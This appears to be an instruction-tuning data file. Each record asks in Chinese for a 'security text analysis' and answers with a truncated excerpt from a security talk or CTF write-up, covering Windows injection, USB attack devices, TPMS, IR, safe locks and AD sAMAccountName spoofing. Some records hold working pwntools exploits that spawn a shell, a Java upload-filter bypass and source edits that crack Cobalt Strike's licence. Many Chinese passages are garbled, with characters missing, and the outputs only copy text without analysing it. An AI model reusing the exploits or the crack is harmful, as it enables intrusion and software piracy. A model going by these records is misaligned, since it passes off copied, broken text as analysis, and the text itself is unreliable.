{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.vulhub.shirodemo; import org.apache.shiro.SecurityUtils; import org.apache.shiro.authc.AuthenticationException; import org.apache.shiro.authc.UsernamePasswordToken; import org.apache.shiro.subject.Subject; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.*; @Controller public class UserController { @PostMapping(\"/doLogin\") public String doLoginPage(@RequestParam(\"username\") String username, @RequestParam(\"password\") String password, @RequestParam(name=\"rememberme\", defaultValue = \"\") String rememberMe) { Subject subject = SecurityUtils.getSubject(); try { subject.login(new UsernamePasswordToken(username, password, rememberMe.equals(\"remember-me\"))); } catch (AuthenticationException e) { return \"forward:/login\"; } return \"forward:/\"; } @RequestMapping(\"/\") public String helloPage() { return \"hello\"; } @RequestMapping(\"/unauth\") public String errorPage() { return \"error\"; } @RequestMapping(\"/login\") public String loginPage() { return \"login\"; } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\naaaddress1@chroot.org Windows Injection 101: from Zero to ROP ./Bio  馬聖豪, aaaddress1 aka adr  Chroot, TDOH  TDOHConf: 2016 議程組長 & 2017 活動組長  精通 C/C++Windows 特性逆向工程  Speaker: HITCON CMT 2015 HITCON CMT 2016 Lightning SITCON 2016 SITCON 2017 iThome#Chatbot 2017 BSidesLV 2016 ICNC'17 MC2015 CISC 2016 資訊安全基礎技術工作坊 資安實務攻防研習營 大.大.大..大概啦 aaaddress1@chroot.org #murmur Some Bullsh*t after I submit this session aaaddress1@chroot.org Amazing! aaaddress1@chroot.org cfp2017.hitcon.org 六欲投稿者請於 2017 年年 7 月 14 日前至大會投稿 系統 ( https://cfp2017.hitcon.org ) 註冊並上傳稿件俾 利利議程委員審核審核順序以投稿時間先後為準如已 達本屆所需論文數量量大會得提前截稿故請儘速完成 投稿程序 aaaddress1@chroot.org 2017/7/18? https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process aaaddress1@chroot.org 議程中請不要睡著 我也很想睡 請踴躍舉手發言 說好不插嘴的 請勿吸菸抽大麻跑百米賽跑玩碟仙摸八圈 跳八家將炸鹽酥雞到我背後抓寶問我會不會FreeStyle ./CoC @Loki the Corgi aaaddress1@chroot.org Evolution Of Malware Long Story About How Malware Against AntiVirus aaaddress1@chroot.org R3m0t3-C0ntr0l;H4ck;C&C; B4ckdo0r;Sh311;B0tn3t;K3y l0gger;Ma1ware;Ro0t;W0rm; Zer0-D4y;Trojan;Exp10it;H 4ck;$cript;Packet;Cr4ck;R 4T;$ecuri7y;vu1ner4bi1i7y 4dmini$tr4t0r;Byp4$$ing;= Hacker Friendly World aaaddress1@chroot.org until AntiVirus; aaaddress1@chroot.org PE (Portable Executable); aaaddress1@chroot.org Virus Signature; aaaddress1@chroot.org PE (Portable Executable); aaaddress1@chroot.org DOS Header DOS Program NT Header  PE File Header Optional Header aaaddress1@chroot.org DOS Header DOS Program NT Header  1. DOS Header starts with 'MZ' 2. *(DWORD *)((DOS Header + 0x3c) point to NT Header PE File Header Optional Header File Header is also referred to as COFF header. Records NumberOfSections, TimeDateStamp,SizeOfOptionalHeade r, etc. aaaddress1@chroot.org Optional Header typedef'struct'_IMAGE_OPTIONAL_HEADER'{' ''WORD'''''''''''''''''Magic;' ''BYTE'''''''''''''''''MajorLinkerVersion;' ''BYTE'''''''''''''''''MinorLinkerVersion;' ''DWORD''''''''''''''''SizeOfCode;' ''DWORD''''''''''''''''", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOath Betrayed: Torture, Medical Complicity, and the War on Terror by Steven H. Miles, M. D. (Random House. New York. 2006) Reviewed by Richard Thieme ThiemeWorks PO Box 170737 Milwaukee WI 53217-8061 414 351 2321 rthieme@thiemeworks.com www.thiemeworks.com number of words in the body of the review: 765 We all come to big issues like torture and terror from our own biographies. We cannot be dispassionate when compelled to reflect on horrific events that cause cognitive dissonance or worse. So let me begin this review with a conversation over a cup of coffee in Washington DC, earlier this year. I met Steven Miles in a restaurant before this book was published. Miles is a soft-spoken physician from Minneapolis, MN, where he is a Professor of Medicine at the University of Minnesota Medical School and a faculty member of the Center for Bioethics. He looks and sounds quintessentially professorial, with a pleasant smile and an easy manner. Yet our conversation was almost conspiratorial in tone, even though the 35,000 documents Miles consulted for this book were in the pubic domain, thanks to the ACLU and FOIA. Nothing we discussed was really a secret. But Miles had had to discover the meaning of links between documents for himself, connecting the dots from document to document (the documents in were separate files, the connections between them not easily searchable by software.) He had to correlate the movements of military physicians with diverse places and events. As he discussed his research, outrage and rage burned through Miles restrained demeanor. He described how doctors had aided and abetted torture in Iraq, Guantanamo, and other places, some still hidden from view. That our conversation about documents in the public domain in a public place should feel conspiratorial is a tip-off to what it does to us to enter the world of this book. We were not being paranoidwe were experiencing the impact of confronting what is being done in the name of the war on terror and in ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOne Device to Pwn Them All Phil Polstra Bloomsburg University of Pennsylvania @ppolstra http://philpolstra.com What is this talk about?  A pocket sized device that can be  Drop box (can be battery powered for days if needed)  Remote hacking drone (controlled from up to 2 miles away)  Airborne hacking drone (when combined with RC aircraft)  Hacking console (can and has been built into a lunch box)  Used for USB-based attacks  Write protect flash drive  USB impersonation  Scriptable HID Why should you care?  BeagleBone Black running Deck Linux is  Small  Flexible (wired/wireless battery/USB/wall power)  Can be networked to integrate into sophisticated pentests  So, you might have one on you  Exploit brief physical access to target  As we'll see, can do a lot in a couple seconds Who am I?  Professor at Bloomsburg University teaching digital forensics & information security  Author: Linux Forensics & HPTWLPD  Programming from age 8  Hacking hardware from age 12  Also known to fly, build planes, and do other aviation stuff  Course author for PentesterAcademy.com and others Roadmap  Quick overview of BBB running Deck Linux  Exporting BBB-attached USB drive to PC (read-only)  Write-enabling an exported drive (BHEU12)  USB mass storage device impersonation (DC20)  Scriptable USB HID keyboard  Base OS  Built on Ubuntu 14.04  Optimized for the BBB & pentesting  Use as dropbox or hacking console  Over 4000 packages pre-installed (fluff free)  MeshDeck  Adds remote control via 802.15.4/ZigBee networking  Allows coordinated attacks with multiple remote drones  AirDeck  Combined with the MeshDeck to allow airborne drone or router  4Deck  Forensic add-on that automatically write blocks USB mass storage devices (udev rules-based)  Udeck (USB-based attacks) USB Gadget Basics  USB composite gadget device used for  Mass storage  Audio  Networking  MIDI  CDC  Webcam  HID (4.x kernels only!) USB Gadget on BBB  Default config uses g_multi (USB composite gadget)  Normally exports boot par", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLetting the Air Out of Tire Pressure Monitoring Systems Mike Metzger - Flexible Creations mike@flexiblecreations.com 1 History  Porsche - First implemented on the 959 in 1986 (Thanks Wikipedia)  A bunch of various styles used in luxury cars  TREAD act - Basically, the Firestone / Ford Explorer problems in the 90s instigated legislation mandating use 2 TPMS Types  Direct - This is used in most vehicles  Battery / Battery-less  Indirect - Uses ABS and various calculations instead of a sensor  Focus on battery-powered Direct TPMS 3 Direct TPMS Description  Typically 4 sensors, possibly 5 w/ spare, mounted on wheel (behind the valve stem)  Receiver is built into car, often collocated with the keyless entry components  Car ECU / PCM processes info - behaves differently depending on car 4 Annoying TPMS Light 5 Sensor Description  Most are a combination of an ASIC (ie, a microcontroller - Atmel / Freescale / Microchip, etc), a pressure sensor, and some RF components  Typically part of the valve stem and sits in a recessed area of the rim, inside the tire  RF transmits in 315MHz band (US) or 433MHz (EU) 6 Sensor Description  Can be woken up by:  Rotation  Low frequency transmission (125kHz - modulated or continuous)  Magnets  Transmission system varies by manufacturer but is typically once per minute unless theres a problem (meaning, significant pressure variation)  Transmissions can overlap, requiring retransmits 7 Sensor Internals  Siemens VDO (From a Mazda 3, 6, or RX-8)  Uses an ATMEL AT092 chip (4-bit microprocessor)  A MEMS style pressure sensor  Simple RF transmission components  Battery (CR2302)  Assorted passive components 8 Before... 9 During... 10 After... 11 And then...  A discovery...  http://www.fcc.gov/oet/ea/fccid/  Enter in the Grantee & Product code 12 FCC Testing Documents 13 Including...  Spectrum Analyzer output  General description of operation  Often a build of materials  etc...  But how to find all the FCC IDs? 14 eBay... 15 Receiver Description  Typica", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 LPHCTF bypass出题视 N. 绕过后缀 O. 绕过可字符检测 P. 绕过名单检测 @yzddmr6 在L3HCTF中出了道java上传绕过题bypass其中题中的些trick不仅仅是于CTF出题 对于实战渗透也是有定的帮助今天跟家分享下出题时的些思考跟解题细节 题有三道过滤 后缀jsp/jspx会被替换为空双写绕过jsjspp常规操作 1. 绕过后缀 2. 绕过可字符检测 Plain Text 复制代码 public static String checkExt(String ext) { ext = ext.toLowerCase(); String[] blackExtList = { \"jsp\", \"jspx\" }; for (String blackExt : blackExtList) { if (ext.contains(blackExt)) { ext = ext.replace(blackExt, \"\"); } } return ext; } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 2 第阶段题中直接getString获取FileItem的内容然后传了checkValidChars函数检测 checkValidChars函数主要功能是检测content中是否存在连着两个以上的字数字如果匹配成功则提 示上传失败 这其实是模拟了个WAF的场景因为很多WAF对于件上传都会有很粗暴的拦截碰到jsp标签就 给死 乍看似乎并不可能被绕过因为只要连着两个字数字就会被检测到让不由得想起了CTF经典题 php字数字webshell但是java不像php样持变量函数需要从其他地下 这就到了个trickFileItem.getString()对于编码的解析跟Tomcat解析jsp是有差异的默认为 ISO-8859-1 Plain Text 复制代码 String content = item.getString(); boolean check = checkValidChars(content); ... public static boolean checkValidChars(String content) { Pattern pattern = Pattern.compile(\"[a-zA-Z0-9]{2,}\"); Matcher matcher = pattern.matcher(content); return matcher.find(); } 1 2 3 4 5 6 7 8 Plain Text 复制代码 public String getString() { byte[] rawdata = this.get(); String charset = this.getCharSet(); if (charset == null) { charset = \"ISO-8859-1\"; } try { return new String(rawdata, charset); } catch (UnsupportedEncodingException var4) { return new String(rawdata); } } 1 2 3 4 5 6 7 8 9 10 11 12 13 3 Tomcat对于jsp编码的解析主要在org.apache.jasper.compiler.EncodingDetector这个类其中有很 多默认ISO-8859-1法直接解析的编码 4 Plain Text 复制代码 private EncodingDetector.BomResult parseBom(byte[] b4, int count) { if (count < 2) { return new EncodingDetector.BomResult(\"UTF-8\", 0); } else { int b0 = b4[0] & 255; int b1 = b4[1] & 255; if (b0 == 254 && b1 == 255) { return new EncodingDetector.BomResult(\"UTF-16BE\", 2); } else if (b0 == 255 && b1 == 254) { return new EncodingDetector.BomResult(\"UTF-16LE\", 2); } else if (count < 3) { return new EncodingDetector.BomResult(\"UTF-8\", 0); } else { int b2 = b4[2] & 255; if (b0 == 239 && b1 == 187 &", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom a2s import A2S from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad import hashlib from uuid import uuid4 key = uuid4().bytes cipher = A2S(key) p = [] c = [] for _ in range(3): plaintext = uuid4().bytes p.append(plaintext.hex()) ciphertext = cipher.encrypt_block(plaintext) c.append(ciphertext.hex()) flag = open(\"flag.txt\", \"rb\").read() sha1 = hashlib.sha1() sha1.update(str(key).encode('ascii')) new_key = sha1.digest()[:16] iv = uuid4().bytes cipher = AES.new(new_key, AES.MODE_CBC, IV=iv) encrypted_flag = cipher.encrypt(pad(flag, 16)) print('plaintexts = ', p) print('ciphertexts = ', c) print('iv = ', iv.hex()) print('encrypted_flag = ', encrypted_flag.hex()) print(hex(key[0]), hex(key[-1]))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 sAMAccountName欺骗分析和复现 CVE-OLON-QOOVW - Name impersonation 分析 SamAccountName SAM-Account-Type userAccountControl UF_WORKSTATION_TRUST_ACCOUNT ( QLXT ) UF_SERVER_TRUST_ACCOUNT ( WNXO ) UF_NORMAL_ACCOUNT ( SNO ) UF_INTERDOMAIN_TRUST_ACCOUNT ( OLQW ) 利 创建机器账号 修改samAccountName 检测 总结 拓展 CVE-OLON-QOOWV - KDC bamboozling Kerberos简单概念 PAC特权属性证书 分析 利 检测 sAMAccountName欺骗漏洞复现 利条件 域内打法 N.判断下MAQ的值 O.判断是否打了KBSLLWPWL补丁 P.获取下DC的机器账号 Q.创建个机器账号 2 S.创建机器帐户的SPN T.修改samaccountname V.GetTGT W.更改机器帐户 samaccountname X.请求 SQUOself 票证并注内存 NL.使该票证进 DCSync 键具 nopac 域外攻击 N.创建个机器账户 O.修改我们创建的机器账号的samAccountName值 P.GetTGT Q.重置机器的samAccountName值 S.GetST T. DCSync 林信任打法 MAQ=L的打法 本仅限安全学习研究本能有限和时间匆忙如有错误请及时批评指出 ---空对抗中李国聪(id:李) CVE-2021-42278 - Name impersonation https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts- manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e Active Directory 将对由没有计算机帐户管理员权限的户创建或修改的计算机帐户的 sAMAccountName和UserAccountControl属性执下列出的验证检查 1.户和计算机帐户的 sAMAccountType 验证 ObjectClass=计算机或计算机的类帐户必须具有 UF_WORKSTATION_TRUST_ACCOUNT 或 UF_SERVER_TRUST_ACCOUNT 的 UserAccountControl 标志 3 在AD属性AMAccountName中存储帐户登录名或户对象,实际上是命名符号Domain\\LogonName 中使的旧NetBIOS表单该属性是域户对象的必需属性SAMAccountName应始终与UPN主体 名称保持致即SAMAccountName必须等于属性UserPrincipalName 的前缀部分 与早期版本的Windowspre-windows 2000起使; 户登录名格式domain\\user-name 不能超过20个字符 在域中的所有安全主体对象中是唯的 例如 域名qax.com SamAccountNameqax NetBIOS登录名qax.com\\qax UserPrincipalNameqax@qax.com ObjectClass=户必须具有 UF_NORMAL_ACCOUNT 或 UF_INTERDOMAIN_TRUST_ACCOUNT 的 UAC 标志 2.计算机帐户的 sAMAccountName 验证 其UserAccountControl属性包含 UF_WORKSTATION_TRUST_ACCOUNT 标志的计算机帐户的 sAMAccountName必须以单个美元符号 ($) 结尾如果不满这些条件Active Directory 将返回失 败代码 0x523 ERROR_INVALID_ACCOUNTNAME失败的验证记录在系统事件志的 Directory- Services-SAM 事件 ID 16991 中 如果不满这些条件Active Directory 将返回失败代码 ACCESS_DENIED失败的验证记录在系统 事件志的 Directory-Services-SAM 事件 ID 16990 中 分析 SamAccountName 于持运早期版本操作系统的客户端和服务器的登录名例如 Windows NT 4.0Windows 95Windows 98 和 LAN Manager 此属性必须少于 20 个字符以持早期客户端并且不能包含以下任何字符 \"/ \\ ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNu1L TWCTF2019 Writeup Nu1L Teamhttps://nu1l-ctf.com Nu1L TWCTF2019 Writeup Pwn warmup printf Asterisk-Alloc mi SecureKarte Web j2x2j PHP Note Oneline Calc Reverse Easy Crack Me Meow Holy Grail War M Poly Cipher EBC Crypto Real Baby RSA Simple logic Pwn warmup from pwn import * context(arch='amd64') p = process('./warm') p = remote('nothing.chal.ctf.westerns.tokyo', 10001) p.recvuntil('me :)\\n') p.sendline('%47$llx'.ljust(0x108,'a')+p64(0x400709)+p64(0x4006ba)) addr = int(p.recv(12),16) print hex(addr) ree = addr -(0x7ffc2b7b4460-0x0007FFC2B7B4288)+8 p.recvuntil('me :)\\n') sh = asm(shellcraft.sh()) raw_input() p.sendline(sh.ljust(0x108,'\\x00')+p64(ree)) p.interactive() printf from pwn import * #p = process('./p') p = remote('printf.chal.ctf.westerns.tokyo', 10001) elf = ELF('./p') libc = elf.libc # gdb.attach(p,\"b *\"+hex(proc+0x1291)) p.recvuntil('name') # p.sendline('%llx '*41+\"AAAA\"+'%llx'*12) p.send(\"%lx \"*0x40) p.recvuntil('0 ') addr = int(p.recv(12),16) libc.address = addr - 0x1e7580 log.info(\"libc.address:\"+hex(libc.address)) cnt = p.recvuntil(\"\\n\",drop=True) data = cnt.split(\" \") #proc = int(data[37],16)-0x10d0 #log.info(\"proc:\"+hex(proc)) stack = int(data[38],16) log.info(\"stack:\"+hex(stack)) log.info(hex(stack-0x6d0)) canary = int(data[39],16) log.info(\"canary:\"+hex(canary)) system = libc.sym['system'] binsh = next(libc.search(\"/bin/sh\\x00\")) p.recvuntil('comment') init = stack-0x760 log.info(\"init:\"+hex(init)) if init&0xff==0: exit(0) ret = ((init&0xff)+0xd8-0xf-0x7-0x7+0x8) if ret>0x100: exit(0) Asterisk-Alloc ''' init = stack-0xa0+0xe0 log.info(\"init:\"+hex(init)) byte1 = init&0xff byte2 = (init>>8)&0xff ''' print(hex(ret)) payload = '%lx'*34 payload = payload.ljust(0xb0,'a') payload += \"%s%d\"+chr(ret-8)*0xa payload += \"A\"*0x5 payload += p64(stack-0x108) payload = payload.ljust(0xd8,'A') payload += p64(stack-0x600) payload += p64(canary) payload += 'aaaaaaaa' payload += p64(libc.address+0xe2386) print hex(stack-0x108) print hex(len(payload)) p.send(payloa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTineola: Taking A Bite Out of Enterprise Blockchain Attacking HyperLedger Fabric Parsia Hakimian, Stark Riedesel Defcon 26  Aug 11, 2018  2018 Synopsys, Inc. 2 5 Courses Our Team Enterprise Blockchains A Use Case The Target  HyperLedger Fabric Tineola  2018 Synopsys, Inc. 3 HyperLedger Fabric  Core Research Group Parsia Hakimian Senior Consultant Stark Riedesel Senior Consultant Travis Biehn Emerging Tech Lead Koen Buyens Principal Consultant  2018 Synopsys, Inc. 4 Enterprise Blockchain Terroir Enterprise Blockchain Enthusiasts Tech Auto & Aero Financial Services Accounting Healthcare Logistics Oil Enterprise Platforms Public Platforms  2018 Synopsys, Inc. 5 Platform Desires Meet Reality Promise Immutability Auditability Tune-able Trust Programmable Challenge Immutability Mutability Privacy Correctness and Speed Execution Environment Platform Complexity  2018 Synopsys, Inc. 6 On The Chopping Block Enterprise Blockchain Enthusiasts Tech Auto & Aero Financial Services Accounting Healthcare Logistics Oil Enterprise Platforms Public Platforms  2018 Synopsys, Inc. 7 Build Blockchain Insurance App Our Enterprise Application Strawman  2018 Synopsys, Inc. 8 Build Blockchain Insurance App  2018 Synopsys, Inc. 9 Build Blockchain Insurance App  2018 Synopsys, Inc. 10 Meet HyperLedger Fabric An Interesting New Machine  2018 Synopsys, Inc. 11 Chaincode: Fabrics Smart Contracts  2018 Synopsys, Inc. 12 Security Model  2018 Synopsys, Inc. 13 HyperLedger Machine  2018 Synopsys, Inc. 14 HyperLedger Machine  Proposal  2018 Synopsys, Inc. 15 HyperLedger Machine  Concrete Execution  2018 Synopsys, Inc. 16 HyperLedger Machine  Endorsement  2018 Synopsys, Inc. 17 HyperLedger Machine  State Transition  2018 Synopsys, Inc. 18 HyperLedger Machine  New Global State  2018 Synopsys, Inc. 19 HyperLedger Machine  Suspect Non BFT Optional BFT Caching  2018 Synopsys, Inc. 20 Tineola A Tool to Interface With HyperLedger Fabric  2018 Synopsys, Inc. 21 Appetizers  2018 Synopsys, Inc. 22 Enumeration  2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# My First App (Web, 399p, 62 solved) Honestly we're not exactly sure what was the idea behind this task. We get a link to a webapplication which says: ``` After much research, I've found on stackoverflow.com how to protect my framework app. ``` And there is a link to `/getflag`, but there is a password prompt when we try to go there. It seems the authentication is based on some regex rather than on directory structure since going to `/getflags` also gives us authentication prompt and not 404 error. Additionally we can see that going to `/index.php` and `/index.php/` gives us the same results. This all suggests some mod_rewrite magic underneath. We simply tried to see what will happen if we do `/index.php/getflag`, which would depend on the regex rules order, and we got the flag: `EKO{fucking_m0d_r3wr1t3}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCaught you - reveal and exploit IPC logic bugs inside Apple Zhipeng Huo,,Yuebin Sun,,Chuanda Ding of, Tencent,Security,Xuanwu,Lab Who are We?  Zhipeng Huo (@R3dF09)  Senior security researcher  Member of EcoSec Team at Tencent Security Xuanwu Lab  macOS, iOS and Windows platform security  Speaker of Black Hat Europe 2018, DEF CON 28 Who are We?  Yuebin Sun (@yuebinsun2020)  Senior security researcher  Member of EcoSec Team at Tencent Security Xuanwu Lab  macOS, iOS platform security Who are We?  Chuanda Ding (@FlowerCode_)  Senior security researcher  Leads EcoSec Team at Tencent Security Xuanwu Lab  Windows platform security  Speaker of Black Hat Europe 2018, DEF CON China 2018, DEF CON 28 Agenda  Introduction  IPC on Apple Platforms  IPC Logic Vulnerabilities  Preferences  App Store  Conclusion Introduction Inter-Process Communication  Inter-Process Communication (IPC) is the set of techniques provided by the operating system to allow processes to communicate with each other  Roles - Client/Server  Client requests Server  Server responds to Client if needed  IPC Channel Client IPC Channel ( Kernel ) send reply Server receive reply Why Needs IPC ?  Modularity  Divide complex system to separated modules  Dont Repeat Yourself  Stability  Module crash would not crash entire system  Privilege separation  Isolate sensitive operations into separated processes  Principle of Least Privilege  Module attacked would not compromise entire system An IPC Example: Browser Architecture Render Process Network Process Browser main Process System Service System Service IPC IPC IPC IPC IPC IPC IPC IPC Breaks Security Boundary  Different process, different privilege  IPC is the Window between different privilege  IPC vulnerability is Key to the high privilege Security Boundary low privilege high privilege sandboxed non-sandboxed IPC IPC Logic Vulnerability  Not memory corruption vulnerabilities  Boring for us  Kinds of logic flaws  Design flaw  Implementation flaw  Combine features to ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCobaltStrike 4.3 简单修改 几个月没有使用CobaltStrike了因此最新的4.3我也没有自己修改的版本今天为了测试 HiveNightmare于是乎修改了下 网上有@Twi1ight同学写的比较通用的CSAgent CSAgent使用需要引入jar包并且windows下不能使用cobaltstrike.exe去启动我个人还是习惯一个 cobaltstrike.jar只做必要的修改因此就自己修改了下 主要修改了Authorization.classBeaconData.class两文件 方便新手同学自己简单修改我还是详细说下步骤 Authorization.java我在代码中标注可以自定义的部分主要还是watermark package common; import java.io.*; public class Authorization { protected int watermark; protected String validto; protected String error; protected boolean valid; public Authorization() { this.watermark = 0; this.validto = \"forever\"; this.error = null; this.valid = true; try { this.watermark = 29999999; //这个watermark也是id建议自己定义随便修改成 其他数字比如28888888 MudgeSanity.systemDetail(\"valid to\", \"perpetual\"); MudgeSanity.systemDetail(\"id\", this.watermark + \"\"); SleevedResource.Setup(hex2bytes(\"3a4425490f389aeec312bdd758ad2b99\")); } catch (Exception ex2) { MudgeSanity.logException(\"auth file parsing\", ex2, false); } } public byte[] hex2bytes(String s) { int len = s.length(); byte[] data = new byte[len / 2]; for (int i = 0; i < len; i += 2) { data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i+1), 16)); } return data; } BeaconData.java public boolean isPerpetual() { return \"forever\".equals(this.validto); } public boolean isValid() { return this.valid; } public String getError() { return this.error; } public String getWatermark() { return this.watermark + \"\"; } public long getExpirationDate() { return CommonUtils.parseDate(this.validto, \"yyyyMMdd\"); } public boolean isExpired() { return System.currentTimeMillis() > this.getExpirationDate() + CommonUtils.days(1); } public String whenExpires() { final long n = (this.getExpirationDate() + CommonUtils.days(1) - System.currentTimeMillis()) / CommonUtils.days(1); if (n == 1L) { return \"1 day (\" + CommonUtils.formatDateAny(\"MMMMM d, YYYY\", this.getExpirationDate()) + \")\"; } if (n <= 0L) { return \"TODAY (\" + CommonUtils.formatDateAny(\"MMMMM d, YYYY\", this.getExpirationDate()) + \")\"; ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEF CON 24 Side-channel attacks on high- security electronic safe locks plore@tuta.io Agenda  Background on electronic safe locks  Cracking S&G 6120 safe lock  Recovering keycode using power analysis  Cracking S&G Titan PivotBolt safe lock  Recovering keycode using timing attack  Defeating incorrect-code lockout Background  Electronic safe locks Image: ellenm1 on Flickr / CC BY-NC Background  Electronic safe locks  Safe lock certification  UL Type 1 High-security electronic lock  Many others  Out of scope: cheap, non-certified locks  Many of these can be easily brute-forced  Some can be spiked (bolt motor driven directly)  Some can be bypassed mechanically (see, e.g., [2] or [3]) Agenda  Background on electronic safe locks  Cracking S&G 6120 safe lock  Recovering keycode using power analysis  Cracking S&G Titan PivotBolt safe lock  Recovering keycode using timing attack  Defeating incorrect-code lockout Sargent & Greenleaf 6120-332 6120  System model MCU Outside of safe Battery Keypad EEPROM Bolt motor Inside of safe Lock Steel safe door ¼ hole for wires Buzzer 6120  Design  Keycodes stored in the clear in EEPROM  MCU reads/writes EEPROM via 3-wire serial  Microwire interface (similar to SPI)  Nice and slow  EEPROM to MCU ~1.5 kbit/s  Hundreds of milliseconds to read all data  Lock reads all keycodes out of EEPROM on every attempt 6120  Vulnerability  Susceptible to power analysis  Keycode bit values change amount of current consumed during EEPROM read-out  Translate current changes into key values  Enter key values on keypad  Zero modification required  Zero evidence of tampering left behind  Covert entry 6120  Circuit model Data line volts 100 k Data line Volts across R1 Current through R1 R1 1 0 0 volts 5 volts 50 A 0 A Higher current consumption means the bit being read from EEPROM is a 0, and a lower current means the bit is 1 Vcc Bit value 5 volts 0 volts EEPROM Amplifier Oscilloscope Sense Resistor Battery MCU 6120  Full scope trace  1 nibble per keycode digi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction Major Malfunction Security professional by day White Hat hacker since the '70s DEFCON Goon since DC5 Co-founder of InterFACE internet pirate radio station Introduction Why Infra Red? Ubiquitous - still used in modern applications TV / Cable / Sat remotes Master configuration / Tuning Package selection Central control / Billing Vending machines Programming / price changes On / Off duty Public display signs Message programming Master configuration Garage door openers Car alarm systems / Central locking Air conditioning systems Introduction Why MMIrDA? 'Major Malfunction's Infra Red Discovery Application' Built in IrDA Serial port on laptops Originally intended to write a tool for FreeBSD, but found LIRC and other tools already existed under Linux Introduction Why Bother? IR unlikely to be replaced Fit for use Cheap Simple If it ain't broke, don't fix it! Because it's there! Good skills Practice your art Know your enemy All work & no play... Introduction IR is the ultimate in 'security by obscurity' Invisible rays hide a multitude of sins Simple codes Total control Inverted security model End user device filters content e.g. Hotel PPV TV Simple Replay Attacks Record codes and retransmit Early Car Alarms Garage Doors Toys - RoboSapien Standard TVs Bars, Clubs etc. Clone 'special' remotes Cloning / Replay Tools Learning remotes Casio IR Watches Apple Newton OmniRemote PalmOS Dev library http://www.pacificneotek.com/ Philips Pronto Human readable (Hex) http://www.remotecentral.com/ Pronto tools Brute Force Attacks Record codes, analyse and infer Garage Doors TVs Cars Brute Force Tools LIRC http://www.lirc.org/ Visualisation tools Auto learning ASCII / Human readable config Software only with laptop IR port Linux only iRTrans http://www.irtrans.de/ More powerful transmitter Solves PC timing issues Works with more targets Serial or USB Linux or Virus Garage Door Openers Simple code, manually configurable Dipswitch with 8 on / off bits = 256 possible codes Analy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE RADIOACTIVE BOY SCOUT: NOW EVERYONE CAN GET INTO THE NUCLEAR ARMS RACE WHAT IS A HACKER  SOMEONE VERY CREATIVE  AN EXPLORER  REVERSE ENGINEER  SOMEONE WHO DOEST HAVE A BOX TO THINK OUT OF  DOESNT DRINK THE KOOLAIDE  BOLDLY GOES WHERE NO MAN HAS GONE BEFORE RADIATION, GAMMA RAYS  HIGH ENERGY PHOTONS  CESIUM 137  COBALT 60 NEUTRONS  PRODUCED BY A REACTOR  NO CHARGE  CAN MAKE ELEMENTS RADIOACTIVE RADIATION,ALPHA,BETA, PARTICLES  ALPHA PARTICLES, HELIUM NUCLEUS +2 CHARGE  BETA PARTICLES, ELECTRON ,-1 CHARGE  ONLY DANGEROUS IF INHALED OR INGESTED ATTACKS IN THE PAST THAT COULD HAVE UTILIZED  RUSSIAN POLONIUM 210 INGESTION  IN 1984 THE FOLLOWERS OF BHAGWAN SHREE RAJNEESH SPRAYED SALMONELLA INTO SALAD BARS IN ANTELOPE COUNTRY  IN 1966-7 THE CIA AND DEFENSE DEPT SPRAYED A HARMLESS SUBSTANCE ON TO THE TRACKS OF TWO NYC SUBWAY LINES PASITIVE DETECTORS  GEIGER COUNTER  ION CHAMBER SURVEY  GAMMA SCINTILLATION DETECTOR  COUNTER MEASURES ACTIVE DETECTORS  ILUMINATE OBJECTS WITH NEUTRONS OR GAMMA RAYS  NUCLEAR INTERESTING OBJECT WILL PRODUCE NEUTRONS  COUNTER MEASSURES NONE  DRAWBACKS, IT MIGHT SET OFF A CRUDLEY MADE ATOM BOMB OVER VIEW OF DAVID HAHN  LIVES IN A SUBURB OF DETROIT  BOY SCOUT,ATOMIC ENERGY MERIT BADGE SOCIAL ENGINEER  PROFESSOR HAHN  CZECH REPUBLIC,SAMPLES URANINITE AND PITCHBLEND  PROFESSOR PHYSICS INSTRUCTOR CON SOME GOVERNMENT OFFICALS  RECEIVED A REPLY FROM ONE OUT OF 5 LETTERS  LEARNED FROM GOVERNMENT BERYLLIUM PRODUCES NEUTRONS DAVID HAHN THE CHEMIST  GOLDEN BOOK OF CHEMISTRY EXPERIMENTS  GUN POWER  NITRIC ACID  YELLOW CAKE THE QUEST FOR FISSIONABLE FUEL  